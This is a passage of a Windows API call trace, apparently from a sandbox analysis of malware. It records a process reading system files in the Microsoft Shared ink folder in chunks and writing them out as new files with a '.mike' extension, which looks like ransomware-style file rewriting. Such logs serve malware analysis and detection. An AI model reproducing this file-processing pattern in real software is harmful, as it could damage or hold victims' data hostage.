Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.492] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", lpFilePart=0x0) returned 0x4c [0044.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0044.492] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4b0ec00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4b0ec00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4b81020, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x8420)) returned 1 [0044.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0044.492] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.492] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", lpFilePart=0x0) returned 0x4c [0044.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.492] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x21b02f8 | out: lpFileInformation=0x21b02f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4b0ec00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4b0ec00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4b81020, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x8420)) returned 1 [0044.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.492] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.492] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", dwFileAttributes=0x80) returned 0 [0044.493] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.493] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", lpFilePart=0x0) returned 0x4c [0044.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0044.494] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4b0ec00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4b0ec00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4b81020, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x8420)) returned 1 [0044.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0044.494] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpFilePart=0x0) returned 0x47 [0044.494] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike", lpFilePart=0x0) returned 0x4c [0044.494] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.mike")) returned 1 [0044.495] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpFilePart=0x0) returned 0x48 [0044.495] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpFilePart=0x0) returned 0x48 [0044.495] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpFilePart=0x0) returned 0x48 [0044.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0044.495] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0044.496] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpFilePart=0x0) returned 0x48 [0044.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0044.496] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.497] GetFileType (hFile=0x264) returned 0x1 [0044.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0044.497] GetFileType (hFile=0x264) returned 0x1 [0044.497] CloseHandle (hObject=0x264) returned 1 [0044.497] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpFilePart=0x0) returned 0x48 [0044.497] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpFilePart=0x0) returned 0x48 [0044.497] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.497] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0044.497] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0044.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.497] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.498] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), fInfoLevelId=0x0, lpFileInformation=0x21b1d50 | out: lpFileInformation=0x21b1d50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24261f7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x24261f7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a538339, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf600)) returned 1 [0044.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.498] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpFilePart=0x0) returned 0x48 [0044.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.498] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), fInfoLevelId=0x0, lpFileInformation=0x21b2078 | out: lpFileInformation=0x21b2078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24261f7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x24261f7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a538339, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf600)) returned 1 [0044.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.498] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpFilePart=0x0) returned 0x48 [0044.498] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", lpFilePart=0x0) returned 0x4d [0044.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0044.498] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0044.498] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpFilePart=0x0) returned 0x48 [0044.498] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpFilePart=0x0) returned 0x48 [0044.498] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpFilePart=0x0) returned 0x48 [0044.498] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", lpFilePart=0x0) returned 0x4d [0044.499] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0044.499] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.499] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0044.499] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", lpFilePart=0x0) returned 0x4d [0044.499] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.499] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.499] GetFileType (hFile=0x264) returned 0x1 [0044.499] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.499] GetFileType (hFile=0x264) returned 0x1 [0044.499] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0044.499] WriteFile (in: hFile=0x264, lpBuffer=0x21b2f30*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21b2f30*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0044.500] CloseHandle (hObject=0x264) returned 1 [0044.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0044.500] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), fInfoLevelId=0x0, lpFileInformation=0x21b2a20 | out: lpFileInformation=0x21b2a20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24261f7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x24261f7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a538339, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf600)) returned 1 [0044.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0044.500] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpFilePart=0x0) returned 0x48 [0044.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.501] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.501] GetFileType (hFile=0x264) returned 0x1 [0044.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.501] GetFileType (hFile=0x264) returned 0x1 [0044.501] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0044.501] ReadFile (in: hFile=0x264, lpBuffer=0x21b4064, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21b4064*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.503] CloseHandle (hObject=0x264) returned 1 [0044.504] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", lpFilePart=0x0) returned 0x4d [0044.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.504] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.504] GetFileType (hFile=0x264) returned 0x1 [0044.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.504] GetFileType (hFile=0x264) returned 0x1 [0044.504] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0044.504] WriteFile (in: hFile=0x264, lpBuffer=0x21be5cc*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21be5cc*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.504] CloseHandle (hObject=0x264) returned 1 [0044.505] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpFilePart=0x0) returned 0x48 [0044.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.505] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.505] GetFileType (hFile=0x264) returned 0x1 [0044.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.505] GetFileType (hFile=0x264) returned 0x1 [0044.505] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0044.505] ReadFile (in: hFile=0x264, lpBuffer=0x21c103c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21c103c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.505] CloseHandle (hObject=0x264) returned 1 [0044.506] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", lpFilePart=0x0) returned 0x4d [0044.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.506] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.506] GetFileType (hFile=0x264) returned 0x1 [0044.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.506] GetFileType (hFile=0x264) returned 0x1 [0044.506] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0044.507] WriteFile (in: hFile=0x264, lpBuffer=0x21cb5a4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21cb5a4*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.507] CloseHandle (hObject=0x264) returned 1 [0044.508] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpFilePart=0x0) returned 0x48 [0044.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.508] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.508] GetFileType (hFile=0x264) returned 0x1 [0044.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.508] GetFileType (hFile=0x264) returned 0x1 [0044.508] SetFilePointer (in: hFile=0x264, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0044.508] ReadFile (in: hFile=0x264, lpBuffer=0x21ce014, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21ce014*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.508] CloseHandle (hObject=0x264) returned 1 [0044.509] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike", lpFilePart=0x0) returned 0x4d [0044.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.509] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.509] GetFileType (hFile=0x264) returned 0x1 [0044.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.509] GetFileType (hFile=0x264) returned 0x1 [0044.509] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x5220 [0044.509] WriteFile (in: hFile=0x264, lpBuffer=0x21d857c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21d857c*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.510] CloseHandle (hObject=0x264) returned 1 [0044.510] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpFilePart=0x0) returned 0x48 [0044.510] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.511] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.511] GetFileType (hFile=0x264) returned 0x1 [0044.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.511] GetFileType (hFile=0x264) returned 0x1 [0044.511] SetFilePointer (in: hFile=0x264, 